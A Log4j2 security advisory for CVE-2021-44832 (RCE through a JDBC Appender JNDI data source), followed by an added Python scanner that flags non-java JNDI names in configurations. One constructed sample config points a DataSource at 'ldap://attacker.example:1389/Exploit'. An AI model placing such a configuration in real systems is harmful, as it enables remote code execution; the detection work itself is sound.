
List:       oss-security
Subject:    [oss-security] CVE-2021-44832: Apache Log4j2 vulnerable to RCE via JDBC Appender when attacker contr
From:       Matt Sicker <mattsicker () apache ! org>
Date:       2021-12-28 19:26:40
Message-ID: 5814f3ea-59ae-7533-1ea5-6e7203561a5e () apache ! org

Severity: moderate

Description:

Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix
releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE)
attack where an attacker with permission to modify the logging
configuration file can construct a malicious configuration using a JDBC
Appender with a data source referencing a JNDI URI which can execute remote
code. This issue is fixed by limiting JNDI data source names to the java
protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.

This issue is being tracked as LOG4J2-3293.
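The following is an added example, not code from the advisory or from the
Log4j2 project: a small static scanner that reads a Log4j2 XML configuration
and flags every JDBC Appender whose DataSource jndiName uses a protocol other
than java (the rule the advisory says the fixed releases enforce). The two
embedded configurations are constructed samples; the LDAP hostname is a
placeholder, not a real server. It is assumed here that a scheme-less JNDI
name is a plain local lookup and therefore not flagged; only XML
configurations without namespaces are handled.

```python
"""Flag Log4j2 JDBC Appender DataSources that use a non-java JNDI scheme.

Added example for CVE-2021-44832; not part of the Log4j2 project or the
advisory. Run stand-alone to scan the two constructed sample configs.
"""
import re
import xml.etree.ElementTree as ET
from typing import List, Optional, Tuple

# RFC 3986 scheme grammar followed by ':'; anything without a scheme is a
# plain JNDI name relative to the initial context (assumption: not flagged).
_SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*):")

# Only the java protocol is permitted for DataSource names after the fix.
ALLOWED_SCHEME = "java"

# Constructed sample: an attacker-modified configuration pointing the
# DataSource at an external LDAP server (hostname is a placeholder).
MALICIOUS_CONFIG = """
<Configuration status="warn">
  <Appenders>
    <JDBC name="databaseAppender" tableName="LOGGING.APPLICATION_LOG">
      <DataSource jndiName="ldap://attacker.example:1389/Exploit" />
      <Column name="eventDate" isEventTimestamp="true" />
      <Column name="message" pattern="%message" />
    </JDBC>
  </Appenders>
  <Loggers>
    <Root level="warn"><AppenderRef ref="databaseAppender"/></Root>
  </Loggers>
</Configuration>
"""

# Constructed sample: the same appender bound to a container-managed
# DataSource through the java: protocol, which remains allowed.
SAFE_CONFIG = """
<Configuration status="warn">
  <Appenders>
    <JDBC name="databaseAppender" tableName="LOGGING.APPLICATION_LOG">
      <DataSource jndiName="java:comp/env/jdbc/LoggingDataSource" />
      <Column name="eventDate" isEventTimestamp="true" />
      <Column name="message" pattern="%message" />
    </JDBC>
  </Appenders>
  <Loggers>
    <Root level="warn"><AppenderRef ref="databaseAppender"/></Root>
  </Loggers>
</Configuration>
"""


def jndi_scheme(name: str) -> Optional[str]:
    """Return the lower-cased URI scheme of a JNDI name, or None if absent."""
    m = _SCHEME_RE.match(name.strip())
    return m.group(1).lower() if m else None


def is_permitted_jndi_name(name: str) -> bool:
    """True when the name has no scheme or uses the java protocol."""
    scheme = jndi_scheme(name)
    return scheme is None or scheme == ALLOWED_SCHEME


def _attr(elem: ET.Element, wanted: str) -> Optional[str]:
    """Case-insensitive attribute lookup; Log4j2 matches attribute names that way."""
    for key, value in elem.attrib.items():
        if key.lower() == wanted:
            return value
    return None


def find_unsafe_datasources(config_xml: str) -> List[Tuple[str, str]]:
    """Return (appender name, jndiName) for every JDBC DataSource whose
    JNDI name uses a scheme other than java. Element names are compared
    case-insensitively because Log4j2 plugin names are case-insensitive."""
    root = ET.fromstring(config_xml)
    findings: List[Tuple[str, str]] = []
    for appender in root.iter():
        if appender.tag.lower() != "jdbc":
            continue
        appender_name = _attr(appender, "name") or "<unnamed>"
        for child in appender:
            if child.tag.lower() != "datasource":
                continue
            jndi_name = _attr(child, "jndiname")
            if jndi_name is not None and not is_permitted_jndi_name(jndi_name):
                findings.append((appender_name, jndi_name))
    return findings


if __name__ == "__main__":
    for label, cfg in (("malicious", MALICIOUS_CONFIG), ("safe", SAFE_CONFIG)):
        hits = find_unsafe_datasources(cfg)
        print(f"{label}: {hits or 'no disallowed JNDI data sources'}")
```

The scanner is a configuration audit aid, not a mitigation: the fixed
releases enforce the java-only rule at lookup time regardless of what the
file says, so upgrading to 2.17.1, 2.12.4 or 2.3.2 is the actual fix, and
access to the logging configuration file should be restricted in any case.
Log4j2 also accepts JSON, YAML and properties configurations, which this
example does not parse.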

References:

https://lists.apache.org/thread/s1o5vlo78ypqxnzn6p8zf6t9shtq5143
https://issues.apache.org/jira/browse/LOG4J2-3293
